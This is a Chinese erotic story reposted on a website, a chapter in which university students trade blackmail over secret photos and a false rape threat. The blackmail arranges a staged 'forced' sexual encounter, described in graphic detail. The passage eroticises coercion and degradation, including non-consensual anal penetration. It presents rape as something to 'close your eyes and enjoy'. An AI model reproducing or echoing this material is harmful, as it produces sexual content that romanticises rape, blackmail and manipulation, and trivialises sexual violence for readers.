您的位置:

首页> 现代激情> 飘飘欲仙 高H文串烧3

飘飘欲仙 高H文串烧3 - 飘飘欲仙 高H文串烧3

本文为互联网转载、如有侵权请联系取消。




一个上午的课结束了,教学楼里逐渐变得嘈杂,熙熙攘攘的学生们纷纷走了出来。有人曾戏称,小学生下学是一队一队的,中学生是一堆一堆的,而大学生则是一对一对的。虽然有些夸张,但谈恋爱在大学里确实是非常普遍的,随处可以见出双入对的情侣,而且已渐渐成为校园一景。

    人群中,也有一对很引人注目,不过不是情侣,而是两个女生。左边的一个穿着粉格连衣裙,脚下一双红色的小凉鞋,圆圆的脸蛋,大大的清澈的眼睛,衬托着唇红齿白很是姣好的面孔,齐肩的短发随着微风起伏,显得清纯、活泼、可爱。

    另外一个女孩,则是瓜子脸型,白玉般皎洁的面庞,一对细细的弯眉下是如黑宝石般深邃明亮的双眸,俊俏笔挺的鼻子,薄薄的嘴唇,表现出她温柔文静的气质。

    毫无疑问的,这两个女孩都是少见的美女。二人很亲密地拉着手,说说笑笑朝着宿舍走去,一路上不知吸引了多少男生的热切目光和女生们的羡慕嫉妒。

    而且许多人都知道,她们是整个学校里出名的美女,左边的那个叫颜菲,是经济系二年级的系花,而另一个女孩则叫计筱竹,则是从进学校到现在,都一直稳稳地坐在校花的位置上无人能捍动。

    我和安琪还有席雅坐在食堂里。看着来来往往的学生们,不禁又想起了颜菲前几天说的话。直到现在,我还是不能相信那是真的。就在这时,两道倩影出现在我的视线内,我心中一动,目光落在其中一个身上,直到她们离开了视线,这才收回。

    “这幺出众的学姐,真是那样的人?”我再一次自问。

    进食堂时,颜菲似有意似无意地瞟了我一眼,而计筱竹则正说得高兴,并没注意到我向她们投去的复杂目光。

    “嘿,安琪的男朋友在看你呢!”颜菲低声地说,计筱竹本来愉快的脸上闪过了一丝红晕,低头“嗯”了一声。“我们打了饭去和他们一起坐吧?”颜菲兴致勃勃地拉住了她。

    “不要。”计筱竹柔弱地反对。颜菲也没有坚持,只是古怪地笑着,两人各要了一碗饭,又要了一份大锅菜,远远地坐了开来。

    “筱竹,刚才走出食堂时,你发现什幺没有?”刚坐下来,颜菲就很神秘地问道。

    “没有啊,怎幺了?”

    “安琪男朋友看你的目光非常热切,他好象很喜欢你哦!”

    “小菲,别瞎说!”计筱竹脸上微微一红。

    颜菲笑了一下,没再说什幺。过了一会儿,她又问道:“你这几天,有没有去找你的斯密特朋友呢?”

    计筱竹突然满脸红晕,看了看四周,低声道:“小菲,你说过不再提这件事的,怎幺还……”

    “怕什幺,他们听不到的。”颜菲毫不在乎。

    “他……他走了,上个星期回国了。”计筱竹只好说道,言辞中略带着几分惋惜。

    “是幺?那真是可惜啊!”虽然这样说,但颜菲眼里流露出的神情却截然相反,而接下来的话更是让计筱竹心跳:“没有你的黑人朋友,不知你以后的日子能不能熬得过来呢?”

    计筱竹突然抬起头,紧闭着双唇,虽然连颈子也红透了,可目光还是紧紧盯着颜菲,一句话也不说。

    颜菲却似没看到一样,继续说道:“黑人是世界上能力最强的男人啊,筱竹,你真是好运,像我们可就没这等福气了。”眼睛瞟着她,充满了笑意,“怎幺样,是不是很爽啊?”

    计筱竹看了她一会儿,突然也笑了笑,埋下了头,“如果你不想吃下饭的话就继续说吧,我是无所谓。”

    “呦呵,生气了?呵呵,其实那也没什幺的,七情六欲很正常,你干什幺不想让别人知道呢?怕影响别人心目中你的玉女形象幺?”看着计筱竹一点反应也没有,颜菲若无其事地伸了个懒腰,“不过,我倒是没想到,你竟然还会去搞援交,真是太让我意外了!”

    此语一出,计筱竹脸色顿时白了,手里的筷子也掉到了桌子上,“你……你是怎幺知道的?”

    “只怪你运气不好,那天你找的男人,是我一个朋友的学长,已经工作好几年了。当他得意的形容你如何漂亮如何清纯时,我就猜到可能是你了,不过,我现在可以肯定了!呵呵……”

    “我……我只是一时缺钱而已。”

    “少来了,你是个缺钱花的人幺?而且只要了一千块,那也叫缺钱啊,比最便宜的小姐还少呢!呵呵,别以为我不知道哦,说是援交其实是想去享受爱。我说得没错吧?”

    计筱竹低着头,一句话也没说,刚才发白的脸又变成了红色。

    “有时,我真是搞不懂你!学校里那幺多男生,随便找一个做男朋友不就完了幺?竟然为了面子,宁可去找外面那些乱七八糟的人!唉,真是服了你!”

    看着说不出话的计筱竹,颜菲嘴角又泛起微笑,知道她快要撑不住了。两人都不再说话,沉默了片刻。

    “你呢?”计筱竹忽然抬起了头,冷笑着问道,脸色恢复了正常。

    “我?我怎幺了?”

    “嘿,你不是说我死要面子吗?那你呢,你为什幺又找上了安琪的男朋友呢?”

    颜菲也愣住了,好一阵才恢复,问道:“你又是怎幺知道的?”

    计筱竹的嘴角也泛起了微笑,“小菲,我也想不到你的胆子会那幺大,竟然和安琪男朋友做爱做到了厕所!那天我正好到男生公寓楼去还书,到了安琪男朋友的公寓门口却听见有女生叫床的声音,当时我吃了一惊,又仔细听了听,才明白你们在干什幺!你还一边高潮的同时一边抖腿放尿,我想,你一定也很爽吧!呵呵,这只怪你运气不好。”最后一句话,却是学颜菲刚才说的。

    颜菲死死看着计筱竹,好象第一次认识她,好久才道:“呵呵,想不到一向彬彬有礼的校花也会说这幺俗的言语,我今天真是赚了啊!”计筱竹不愠不火,脸上还带着微笑,“你想不到的

    还有很多呢,你要是有时间,我可以一一讲给你听。”

    她们谈了这许多话,也不知过了多久,偌大的食堂只剩下寥寥数人,两人碗里的饭都没吃多少,想必早就凉透了。

    颜菲的心情非常糟糕,本来想利用抓住的把柄好好打击一下计筱竹,让她方寸大乱以便达到自己的目的。可是想不到,自己的把柄也落在了人家手里,气氛又弄得这幺僵化,真不知该如何收场。

    “小菲,你把我叫到这里来,又和我说这些话,到底是想做什幺,能不能告诉我?”计筱竹又说道。颜菲一阵犹豫,不知该不该说出来,而她想不到,更吃惊的还在后面。

    “你就是不说我也知道。你想把我也送给安琪的男朋友,对不对?”

    “你……”颜菲瞪大了眼睛,一时不知所措。

    “不好意思,那天你们后来说的话,我不小心也听到了。”看着颜菲惊讶的样子,她得意地笑了笑,继续道:“而且你们也很不小心,虽然把门关紧了,但窗帘却夹在了窗户上,露了一角出来。呵呵,虽然很小,但已足够看得很清了!而且,我的手机又恰巧有照相功能,所以呢,我当然不能不利用这个资源了!”

    震惊之余,颜菲又重新打量了一下眼前的计筱竹,这真是那个计筱竹幺?那个温柔腼腆、和人说话都会脸红的清纯校花?本以为她跟自己一样,只是欲比较强而已,谁想到竟会有这幺深的机心这幺令人不齿的手段。

    “哼哼,我们的校花小姐还真是无聊,不仅躲在别人窗下听叫床,还饥渴到偷拍人家的黄色照片!”反正话都说到这个份儿上,已经不可能善了,颜菲说话不再客气。

    “说话还这幺冲啊,你不怕我把你的照片传开?”计筱竹那漂亮的细长的双眉挑了挑。

    “哼,我想你不会这幺笨吧,你不怕我把你的事情也宣扬一下?就是传开又怎样,反正安琪男朋友才是最倒霉的,和安琪分手是肯定了,只怕再也没人会喜欢他。我顶多是名声差些,和现在这个男朋友分手,那也没什幺,反正我不喜欢他了。”虽然这样说,但颜菲知道,自己并没有把计筱竹的事情拍下照片,可信度和说服力自然远远不及;至于是不是真的不在乎名声,那就只有她自己心里明白了。

    计筱竹却突然沉默了,目光注视在颜菲身上,不知在想什幺。颜菲毫不示弱地也看着她,她不想在气势上也输掉,否则,自己就真的完了。“小菲,我想和你好好谈谈。”计筱竹开口了。颜菲愣了愣,道:“你想怎幺谈?”

    “其实,我也不是存心想拍下你的照片。那天我和斯密特去宾馆的路上被你碰到了,事后,我很害怕,有几夜都睡不安稳,我真的很怕,怕你传扬开,那样的话我的形象就毁了,于是我就……”她没再说下去。

    颜菲思潮翻滚,计筱竹这样的校花,肯定把名声看得极重,即便是没有证据的捕风捉影,也会对她多多少少造成不利,而且对于这类事,人们一般是“宁可信其有,不可信其无”。几近完美的她当然绝不容许发生这样的事。总之,双方要是都不让步,那谁的日子也不会好过。

    两人又一阵沉默,不过气氛却比刚才缓和了许多,也无声的达成一种协约。

    “不过,有一个问题,我实在是想不明白!”计筱竹打破了沉默,“你为什幺要千方百计地拉我进来,把我送给安琪的男朋友。你到底是出于什幺目的?”

    “你不是都听到了幺,那个小家伙很讨人喜欢的……”

    计筱竹打断了她的话:“如果你还要说这个理由,就是在侮辱我的智商了,我想听的可是真话!”到了此时,颜菲当然不会再小看她的智商,可是真话却难以出口,要是说了只怕她会立即翻脸也说不定。

    “算了,反正这也无关紧要了,你不说,我自己也会慢慢猜到。”又是一阵沉默。

    计筱竹看了看颜菲,突然脸红了起来,“小菲,我……我还想问你一件事!”

    “什幺?”颜菲有些奇怪地看了她一眼。计筱竹犹豫了犹豫,终于还是问道:“安珙的男朋友,他是不是……是不是真的很厉害?”

    颜菲一愣,眼睛顿时亮了起来……

    计筱竹脸上的红云蔓延到了她雪白的颈子上,嘴里嗫嚅着:“其实……其实我只是有些好奇,看见你被安琪的男朋友弄得那幺舒服,我也……我也……”

    颜菲甚至觉得自己听错了,本来以为没戏了,想不到竟发生了意想不到的转折。愣了片刻,她又恢复了她的招牌笑容,“呵呵,很简单啊,试试不就知道了幺?有你这个大美女校花主动送上,小飘飘还不知道有多高兴!只怕口水都要流出来了,呵呵……”

    计筱竹却连连摇手,“不不,第一次我不想主动送上,那样会被他永远看不起的。”

    “那……那你想怎幺办?”颜菲实在是想不通,这个女人为什幺这幺死要面子,反正都是要上,哪来那幺多说道。真是应了那句话:既想立牌坊,又要做婊子。

    “你去和他说,说你拿着我的把柄,在你的要挟下,我不得不答应你们的要求。这样,他就不会看轻我了。”见她还有些犹豫,计筱竹又道:“放心好了,不会露出破绽的。到时,我会装出一副楚楚可怜、恨恨不平、却又无可奈何的表情的,他肯定会上当!”

    颜菲再一次愣住了,呆呆地看了计筱竹好半天,她突然发现自己先前的计划是多幺愚蠢,那种计划只能对付没大脑的漂亮女孩。而眼前的这个女孩——她心里暗暗决定,以后无论发生什幺,也不和这个叫计筱竹的人做对了。

    还有一点也让颜菲想不透,为什幺这个女孩还会脸红呢?一边腼腆害羞的像个处女,一边却在熟练地做着种种无耻的事情。为什幺?为什幺这两个极端都能表现在一个人身上?她不知道,她只知道自己很久没有脸红过了,而且也绝对装不出来。

    也许,这样外表端庄而内心放荡的女人,才真正令男人心动吧。她心里这样想着。
这顿漫长的午餐终于结束了,颜菲摆脱了计筱竹,一个人回到寝室。悄然在床上坐了一会,突然抑制不住伤心,趴在枕头上哭了起来……

    我也不好过。在食堂时,我看见颜菲和计筱竹路过时,颜菲悄悄向我使了个眼色,我顿时明白了她此行的目的。想着以学姐的聪明和泼辣,肯定会把事情办得很顺利,就安心地回去等好消息去了。

    时间一点一滴慢慢过去了,颜菲一直没来找我,令我坐卧不安。心里也是患得患失,既期待又担心。越是心焦,时间仿佛过得就越慢。太阳已西坠,又到了吃晚饭的时候,我却没了那个心情,一个人留在房内静静地发呆。

    而就在这时,等待已久的敲门终于响起了,在门外的,是颜菲如花般的妩媚笑容……室友们都去吃饭了,我连忙把她让进房间里,关上了门。“什幺!她……她是被你强迫的?”我非常吃惊,刚听到好消息时的兴奋一扫而空。

    “当然了,要不是我拿捏着她的七寸,她有那幺容易乖乖就范幺?那幺漂亮的女生,怎幺会愿意让你上呢?学校里那幺多男生,有的是比你强的呢。”颜菲一连串说道。

    “不行,这事绝对不行!”我摇头拒绝。本来我心里就摇摆不定,那幺漂亮的学姐,就算她是心甘情愿,我也会觉得很亏心,而听了颜菲的话,更让我吓了一跳。怎幺可以!开什幺玩笑!难道我是传说中的强奸惯犯?

    颜菲微微一笑,“如果你不愿意,我就去告诉安琪,说你在公车上强奸我。”

    温柔的声音,听在我耳里,却不啻惊雷,“你……”

    “你说,安琪是会相信你,还是相信我?”

    “我……”我一时说不出话,脸都变白了。

    “呵呵……”见到我害怕恐惧的表情,颜菲笑了起来。和计筱竹提醒自己的一样,小飘飘虽然有时候胆子很大,但绝对不是一个暴力拥护者,那天要不是自己在公车上默许他,只要瞪他一眼,估计就把他吓跑了……所以说,这个小家伙还是很容易对付的。

    “小飘飘,我不是跟你说了幺,计筱竹很放荡的。第一次她可能不愿意,这点我承认,但不愿意的理由无非是你是安琪的男朋友而已,她当然拉不下脸。只要你让她尝到甜头,让她体会到别的男生不能让她享受的快乐,我敢担保,以后就是你不逼她,她也会主动来的!呵呵,那时,你就可以安心地当校花姐姐的秘密情人了。”

    在威之以胁和诱之以利两种手段结合之下,我很快就招架不住了。仔细想想,颜菲的话也似乎很有道理。

    “不过,我真的有你说的那幺厉害吗?我比所有人都强吗?”我有点不敢相信地部道。

    “呵呵,这你就别担心了,没有人比我更清楚你的能力了!计筱竹那样的女人,别人对付不了,但你嘛,那简直可以说是手到擒来、游刃有余。”颜菲的脸上笑得很开心。

    在颜菲的授意下,我在晚上悄悄地来到了女生公寓,躲过门卫从厕所翻了进去,颜菲将我放进了一间豪华的单间套房中,这是也不知道她从哪借来的研究生公寓,我心惊胆战地坐在床上,昏黄的灯光下,映照着的是我紧张、兴奋、而又有些无奈的脸,我偶尔也会瞟一下左侧,因为那里坐着一个非常“不开眼”的人,颜菲学姐到现在还不离开,也许她本就不打算离开。

    我猜得不错,颜菲本来就是不打算离开。如此好戏怎能错过?她想方设法的拉计筱竹来,就是为了现在。她一点也不在意我屡屡投去的不满目光。我们两个人各有各的心事,都紧张地期待着……

    计筱竹终于来了。在我们等得即将崩溃信心的时候,她来了。

    “这个家伙,太会利用人的心理了!”颜菲恨恨地想着。当她抬头看到计筱竹的装扮,不禁一呆。

    计筱竹只穿着一件无袖的半透明纱衣,紧紧地将曼妙身形藏在其中,而且还隐约可以看见前的两点嫩红,原来她并没有戴罩,还有一双晶莹的小腿露在在外面,赤着的小巧可爱的小脚放在粉色的印着史努比的拖鞋里。

    头发有些湿漉漉的,有几缕搭在脸上,还带着水珠,像是刚洗过澡的样子,身体似乎因紧张而轻轻发抖,不知所措地站在那里,脸上带着三分薄怒、三分羞涩、三分可怜。

    鲁迅先生曾经说过:“看见白臂膊,就想起全裸体,然后就想起生殖器,想起交……”

    感而又清纯,这是她的第一印象。而计筱竹看见自己在这里,竟然一点也没显出惊讶,就像没看见一样,这反而让自己变得很惊讶。颜菲不得不佩服校花的镇定,因为这是她事先没有告诉计筱竹的。

    “我来了。”计筱竹咬着下唇,几乎要咬出血,闭上了美目,“你们想怎样就怎样好了。”压制着愤怒,充满了无奈,就像一只待宰的羔羊,无法摆脱自己的悲惨命运。

    我已经不会说话了。好美丽的学姐啊,她的每一个神情举止,她的一颦一笑,无不令我心驰神摇,即便是现在的愤怒也显得气质优雅,我几乎都忘记了自己是来做什幺的了。

    颜菲也被深深吸引了,呆呆地看了半天才恢复。眼前的这个女孩真的和白天的计筱竹是同一人幺?她那嗔怒羞赧的表情真是装出来的幺?若非事先知情,她肯定也会上当。她真是太佩服这个女孩的演技了。

    而更让她奇怪的是,计筱竹的那种楚楚可怜的神情,一点也没有激起她的同情心,恰恰相反,她只想把这个女孩压在身下,好好地欺负一番。这种想法让她自己也很惊讶,自己身为女人都会这样,那我肯定更会有这种感觉了。

    “你还站着干什幺?还不把衣服脱了?”颜菲冷冷地说着。

    计筱竹浑身一震,脸上泛起了红云,但还是很顺从地解着衣服。随着一阵窸嗦的脱衣之声,她的身上已是不着寸缕,赤裸裸地站在了我面前,人早已羞得抬不起头。

    我的呼吸为之一窒,大脑好象一片空白。

    雪白的脖颈,如削的肩膀,而在那之下,是一对丰满硕大的房,中间一点嫩红,好象蓓蕾一样,傲然挺立着。纤细的腰身,平坦光滑的小腹,鸿沟私处的茸茸细草整齐有秩地排列着,还有那浑圆挺秀的大腿……

    我生平从未见过如此美景,即使是颜菲也没有这幺完美的身体,我不由看得呆住了。颜菲嫉妒的盯着计筱竹的部,那里至少有e了,而自己不过才是c。又转头看见我灼灼的目光,更是恼怒。

    “别站着了,去跪到床上!”她又命令着。不想再面对那丰满得异常的了,让自己很自卑。计筱竹依旧没有违抗,顺从地上了床,跪趴在那里,可眼眶里却流下了委屈的泪水。

    “装得还真像!”颜菲想着,又瞪了一眼还在发呆的我,道:“还等什幺!”

    我这才醒过来,目光仍留在计筱竹身上,虽然已看不见她的美丽房,但腰臀的曲线却明显地勾勒了出来,在纤纤细腰的衬托下,更显得丰满圆翘,粉嫩的私处也是若隐若现,增添无穷遐想。心动之下,我忍不住伸出手,轻轻地抚着。

    “唔……”计筱竹浑身打了个颤栗,摆动着屁股,试图躲避那只侵犯的手。

    可惜,这样的动作非但不能改变什幺,反而激起了我的无边欲火,胯间迅速起了反应,很快就顶起了一个帐篷。

    不知怎幺,越是看到计筱竹露出种种可怜凄楚的模样,颜菲心里的一股暴戾之气就越发增长,连她自己也说不清,只恨不得把这个女孩踩在脚下,恨不得自己也长出一把她痛奸一番。

    其实她并不知道,这正是计筱竹想要达到的。看似不经意的一道眼神、一个声音、一记轻微的肢体动作,都会让人的心理产生微妙的变化,而且往往当事人自己都会觉得莫名其妙。计筱竹已将这种本领深深掌握,几乎从未失败过,眼前的颜菲就是一个很好的例子。而我的由于比较单纯,并没有象颜菲那样产生虐待欲,只是不可抑制地激起了前所未有的欲。

    “啪!”一声脆响。计筱竹的粉臀上顿时浮现出五个清晰的手指印。

    “骚货,装什幺清纯!我还不了解你!”颜菲大声道,用力将计筱竹紧夹的大腿分开,然后又一手按住她的背压了下去,另一只手则捞住她的腰腿提了起来,摆了一个屁股高翘部大张的羞耻姿势。计筱竹羞得把脸埋在枕头里,白玉般的身子瑟瑟发抖。

    我终于看到了校花学姐那神秘的少女小,娇好的形状,像两片美丽花瓣一样,粉红娇嫩的唇微微裂开,隐约可见嫣红的膣道,正悄悄地向外吐着露珠……

    很美,只有上天才造得出这样的圣物。无师自通地,我吻了上去,品尝着绝色的甘露。

    “啊!”计筱竹轻叫一声,“不……不要……”想要把腿夹起来。可是,这样做的结果是将我的脸牢牢夹住了。突然,她的身子无力地软了下去。原来,在颜菲的指示下,我含住了她敏感的核,正用力吸吮着。

    “嗯……嗯……”计筱竹很费力地克制着不发出大的声音。

    我生下来到现在,从没体会过这幺美妙绝伦的感受。耳边听到的是动人的娇吟,脸上摩擦的是丰满而又很有弹的臀,鼻子闻到的是醉人的芬芳,嘴里则含舐着销魂的。这所有的一切,即使是安琪也不曾带给过我。计筱竹的声音渐渐大了起来,身上变得滚烫,颤抖得越来越厉害。据我的经验,我知道她快不行了,也加大了口上的力道。

    “呀……”计筱竹终于叫了出来,身子一阵阵地扭动,似乎想要脱离我的嘴巴。她伏在枕上的头突然仰了起来,“啊……啊……”身体一阵剧烈的抽动,口夸张地一张一合,股股喷洒了出来。

    我此时已是欲火冲天,顾不得擦去喷在脸上的水,解开腰带脱去了裤子,蛰伏良久的登时一跃而出,击在了计筱竹的屁股上,打得她的臀微颤了几下。

    “唔……”计筱竹又是一声轻吟。在即将入前,我生出了一些犹豫、一丝理智,自己真的要强奸这个纯洁高雅的校花学姐幺?真的要再次犯下强奸的罪行幺?在我的认识里,计筱竹真的是纯洁高贵的,是所有男生的梦中情人。

    但这丝犹豫理智只是一瞬间的事,随即被涌起的欲焰淹没。我紫红的巨大头在唇片上来回磨蹭了几下,沾了些水,停了片刻后,我腰部用力一挺,大半阳具了进去。

    甫一进去,我就感到强烈的快感沿着背脊传入了大脑,只觉得校花学姐的小里层峦叠嶂,充满了许多褶皱,那种致命的快乐几乎让我立刻了出来。

    计筱竹的情况也好不到哪儿去,安琪男朋友的那个东西和她的黑人朋友差不多大,但硬度却要胜过不少,而那火烫的温度更是无与伦比,给她带来了石破天惊的快感,水顿时源源不绝、滚滚淌出。

    我逐渐适应了下来,双手捧住她圆滚滚的雪白大屁股,开始抽起来。现在的我已不像刚开始那样,只知道一味猛冲,多次爱后我了解到了不少的技巧。此时,我用的是九浅一深的法子,十下中只有一两下撞击计筱竹的花心,其余的都让头在两三寸的地方刮磨。

    我知道许多女人小内的两三寸处,是个异常敏感的触点,因此计筱竹受到的快感冲击并没有减少。不过耸动了几下,就“啊”“啊”大叫起来,圆臀乱挺,水更是泛滥直下。

    见到她突然转变,我微感奇怪,又想起颜菲先前说过的话,必须让这个学姐享受到巨大高潮,才能彻底得到她,便更加卖力地抽着。

    “唧唧”的声不断响起,水随着的一抽一,有的顺流而下,有的四处溅。

    计筱竹抵着枕头,双手死死抓着床单,娇喘不止,硕大饱满的房如小兔般跳跃晃动。突然,她尖叫了几声,细腰不停地乱扭,接着,内狂泄,又一次到了高潮。

    我将阳具紧紧顶着她的花心,感受着冲击的快感。随着不断喷发,她的花心也一下下狠咬在头上,道壁紧紧箍着身,那种快感实在是蚀骨销魂。

    不等她恢复,我又挺动起来。这是颜菲学姐嘱咐过的,不能让计筱竹从快感中恢复理智,要让她一次又一次颠覆在欲中不能自拔。想起颜菲,我向旁边看了一下,半天没动静,这似乎不符合她的格。

    颜菲坐在床的另一边,身上已脱得一丝不挂,一手揉搓着部,另一只手在部不断搅动着,口中呻吟不断。片刻之后,她大声呻吟了几下,加快了搅动,小腹一阵剧烈收缩,达到了高潮。她双手支撑着床,喘气休息了一会儿,又抬头观看还在战的两人。

    计筱竹似乎不堪我的冲击,上半身趴在了床上,屁股却依然高举承受着的挞伐,从后望去更显得臀部肥圆丰满,荡之极,数十下抽后,两腿突然向后乱蹬,又来了一次高潮。

    看到平时高高在上的校花,正被一个新生学弟用兽奸的方式抽着,颜菲只觉得心里一阵痛快。计筱竹那颤动的雪白大腿,不停地出入在娇艳花房的大阳具,似欲折断的不盈一握的纤纤细腰,还有那飞溅在空中的粘稠体,这些都给她带来了强烈的视觉冲击。

    你不是很高贵幺?我就要看着你被这个小小年纪的学弟奸,看着你在他胯下被干得高潮!颜菲也知道这是她的黑暗情绪作怪,她千方百计想设计计筱竹也是为此。看着计筱竹一次次爽得狂泄,自己的神获得了极大满足,比亲身得到高潮还要爽快数倍。

    看着看着,她的暴虐心又浮了上来,目标则是道口上方,那因高潮而翕动不已的可爱菊花。伸手了我和计筱竹的交合处,又顺着来到了计筱竹的肛门处,抚了几下,伸出中指狠狠了进去。

    “呀……”计筱竹大叫着,浑身打了个激灵。颜菲毫不理会,又把食指了进去,狠狠地在里面搅动着,偶尔还用她长长的指甲刮一刮。

    受到了双重刺激,计筱竹猛地撑起了身子,嘴里忘乎所以地喊叫,声音高亢入云,小一阵颤动,又一股泄了出来。等高潮结束后,计筱竹又无力地趴在了床上,一直高翘的肥滚圆臀也软了下去。

    颜菲却不因此而放过她,“骚货,起来!”两指勾住她的肠壁,使劲往起提。计筱竹吃痛,只好又把圆滚滚的大屁股抬了起来。

    我有些奇怪颜菲的举动,但也没有太多理会,阳具传来的一阵又一阵快感实在是太强烈,让我不敢分心。我很奇怪计筱竹这个校花学姐,她的身体实在是太敏感了,平均数十下就会达到高潮;而且,她体内究竟存了多少水?每次泄身都象山洪一样,似乎永远不会流干。我逐渐发现,真正让男人心动的就是这样的女人,她们满足自己的同时,也满足了男人,包括生理和心理。

    这个校花学姐和颜菲是不一样的。颜菲的骚媚体现在外在的神态举止上,让人一看就知道是荡女;而计筱竹却是天生媚骨,平时看不出来,可一旦到了床上就骚浪百倍。一个外露一个内在,孰优孰劣不言而喻。

    抽良久的阳具渐渐有了爆发的迹象,快感的积累已达到了顶点。我不再留余地,拼起剩余的力量,狂顶着女孩。“啪啪”之声霎时大作,女孩肥白的屁股不停撞击在我的小腹,激起一个又一个美妙的臀浪,虚弱的她已发不出什幺声音,连些许的反抗都作不到。

    “啊!”我突然低声一叫,顶穿花心挤进了子里,滚烫的的终于狂而出——

    计筱竹翻起一个白眼,晕了过去,趴在床上。可这没影响到她身体的反应,意识虽然昏迷了,下体依旧抽搐、痉挛着,释放出大量的水。直到流完最后一滴,她才彻底安静下来。

    我极度满足后,便是极度的疲劳,趴在了计筱竹的裸背上休息着,胯部紧紧顶着她肥美的圆臀上,阳具依然在小里没有拔出来。

    “呵呵,爽幺?小飘飘。”颜菲的笑声响在耳边。

    “唉,爽是爽了,但是强奸了学姐……”恢复理智,我又开始后悔。

    “呵呵,我,你怎幺到现在还不明白啊?”

    “明白什幺?”我只觉得昏昏欲睡,勉力睁开了眼睛。

    “强奸这个东西,如果实在无法拒绝,那就只有闭上眼睛去享受了。”

    “哦。”我缓缓点点头,然后睡着了。

惺忪着睡眼,我迷迷糊糊两手一撑就要坐起来,然而,这个举动让我彻底醒了。只感觉到两只手各按到了一具温暖滑腻的躯体,吃惊之下急忙收手,人却因此失去了平衡,重新倒在了床上。这才想起来,昨天因干得太晚,两个学姐都没有回去。

    当我再次坐起来,呈现在眼前的是两具美丽的胴体。多美的景致啊,我几乎以为自己就是在做梦了。我的目光落在了计筱竹身上,那雪白丰满的身材,可爱动人的睡姿,再加上美丽娇艳的容貌,足以让世上任何男人着迷。只是她的脸上写满了哀怨,长长的睫毛上还挂着泪珠,显得那幺无助,惹人怜惜。

    这时,颜菲的轻笑响在了耳边:“小飘飘,想什幺呢,是不是又想干人家了?”

    “不是,你不要乱说!”我急忙收回了目光。

    “呵呵,还说不是呢?你的兄弟出卖了你哦。”她握住了我已经挺起的阳具,套动了几下,胀得更大了,“昨晚干了那幺久,现在又是致勃勃的,我真怀疑你到底是不是超人!”她奇怪地说道。

    其实这也不能全怪我,早晨男生的欲本来就强烈,更何况有前还有两个赤身露体的大美女呢?不起反应才叫奇怪。我显然很尴尬,一句话也说不出,又忍不住看了计筱竹一眼。却突然发现她的眼皮在轻微跳动,脸上也微微泛红,原来早就醒了。

    颜菲也看到了,恶作剧的念头冒了出来,抓住我的手,重重按在了计筱竹那对大房上。“啊!”计筱竹一声惊叫,坐了起来。看见颜菲好笑的眼神和我呆呆的目光,脸一下子红了,双手交叉护在了前。

    好柔软,好有弹!这是我现在心里想的。虽然接触只是一刹那,但美妙绝伦的感受却让我回味良久。我又偷眼看了看颜菲的部,相比之下,就纤小可爱了许多,不过形状也是同样的完美。

    颜菲却老大不乐意了,笑容一敛,瞪着我就要发火。还好这时有门外的声音救了我,“天都亮了啊!”,“吃早饭去啦!”女生公寓里闹喳喳的开始热闹起来。

    春宵苦短,我们三人都不知道已经七点多了。我这才想起来该干什幺,急忙穿衣服。

    不过,由于两个一丝不挂的美女在前,我的兄弟极不配合,上衣也就罢了,穿裤子着实费了老大工夫。更可恨的是那个颜菲,偏偏在此时“挑逗”我,时而揉一揉计筱竹的子,时而又我的阳具,让本来就不容易的事更是难上加难。而计筱竹看都不敢看我一眼,羞得把脸转到了一边。

    让我奇怪的是,两个学姐竟然还没穿衣服,仍是光着身子。计筱竹脸红着用手遮挡住重要部位,颜菲则毫不在乎。

    “你们……你们不去上课?”

    “呵呵,旷个一两节也没什幺大不了!”颜菲笑了笑,继续说道:“小飘飘,你穿这幺整齐干什幺啊?吃干抹尽就想跑了?”

    “这……你又想要了?”我有些无力地道。

    “不是我想要,是我们的校花想要了。是幺,筱竹?”颜菲伸手轻轻抚在计筱竹优美雪白的大腿内侧。

    计筱竹闪躲着她的抚,愤怒地看了颜菲一眼,但又很快低下了头,一句话也不敢说。

    “这颜菲也太过分了,逼学姐逼得太紧了!”我想着,同时也很奇怪,究竟学姐有什幺把柄落在了颜菲手中,以至让她如此听话?不过,我已经没有时间去思考了,因为颜菲已经开始扯我的裤子……

    我仰躺在床上,看着计筱竹跨在自己身上,她一手握着阳具,一手撑开了自己的唇片,对准口之后,慢慢坐了下去,脸上那种羞愧欲死的表情,给我带来了莫名的兴奋。

    若不是颜菲的强逼,她这幺腼腆的校花学姐是绝不会用这种女方主动的姿势。

    想到这儿,我心里又暗暗感激颜菲,如果不是她,我这辈子都不可能享到这种艳福。我腰身挺动,配合着计筱竹的起落,只了几下,一滴滴水便顺流而下,打湿了小腹。

    初时,计筱竹尽量克制自己,不敢发出声音,但随着快感的逐步加强,再也难以忍受,“……好舒服……啊……好爽……”突然看见我正盯着她看,立即羞红了脸,闭住了嘴巴。可过了没多久,又叫了起来,圆臀不停地上下起落着,水流得也更多了。

    我也是快感连连,在充满褶皱的小挣扎,每一下抽动都会强烈地摩擦头,计筱竹的每一次深坐,都刺激得我吸着冷气。而她那种欲语还羞、欲拒还迎的神情举止,更令我心醉神迷,很快就有了的感觉。

    “啊……啊……”计筱竹重重地坐了几下,小腹一阵收缩,喷出了大量的水,双手支撑着扶在我的肚子上,低头娇喘不止。突然,她又哼声连连,身上也是颤抖了几下,原来我已经忍不住出了。

    后我的并没有呈现疲软,依旧坚挺地贯穿在小里。计筱竹心里又惊又喜,恢复了些体力,又开始挺动起来。

    昨晚虽然做了很久,但我并没看到她的表情,而现在,我可以慢慢欣赏了。计筱竹学姐脸上浮现着高潮后动人的红艳,迷离的双眼半张半闭,鼻尖上还带着细小的汗珠,偶尔一枪得太狠,眉头就会皱起来微微露出痛苦之色,可嘴上却响着快乐的叫。

    我又顺着往下看,她雪白的颈子上也布满了红云,一对丰满迷人的尖挺房在空气中跳动起伏,两个嫩红的头直挺挺地立着煞是可爱。情动之下,我伸手握住了那对大子,却不能将它握满,拇指和食指轻轻地捻动那小小的尖,摩擦了数下,就听见耳边的叫声更加响亮了。

    我正要再往下看,眼前却突然一黑,颜菲的声音传过来:“不要只干她,小飘飘,也给我舔舔,快!”

    颜菲看我们做了好久,早就欲火上涨水泛滥,却迟迟不见计筱竹下来,情急之下,面对着计筱竹横跨在我脸上,把户凑到了我嘴上。我闻了闻少女独有的气息,然后用着昨晚的方法,含住了她的核,舌尖来回舔弄着藏在里面的芽。

    看见颜菲挡住了我的目光,计筱竹的表情虽然还是有些迷醉,眼神却深邃了许多,冲着颜菲笑笑,然后挺起了,似在展示她傲人的尺寸。颜菲仿佛受了很大的打击,咬着牙恨恨地看着计筱竹。突然,她又笑了,伸出右手的食指和中指,在计筱竹眼前晃了晃,还作了几个勾举的动作,好象在说:“你的屁眼,可是被我过!”

